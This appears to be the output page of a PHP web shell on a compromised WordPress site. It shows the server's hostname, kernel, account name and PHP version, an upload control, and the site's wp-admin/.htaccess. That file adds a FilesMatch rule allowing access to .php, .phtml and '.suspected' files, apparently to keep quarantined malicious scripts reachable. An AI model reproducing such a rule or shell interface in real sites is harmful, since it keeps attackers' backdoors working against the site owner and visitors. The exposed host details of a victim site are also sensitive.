HEX
Server: Apache
System: Linux srv.tamnokta.com 4.18.0-348.el8.x86_64 #1 SMP Tue Nov 9 06:28:28 EST 2021 x86_64
User: anadolufenerivapuru (10001)
PHP: 8.3.28
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/anadolufenerivapuru.com/httpdocs/wp-admin/.htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
<FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$">
Order Allow,Deny
Allow from all
</FilesMatch>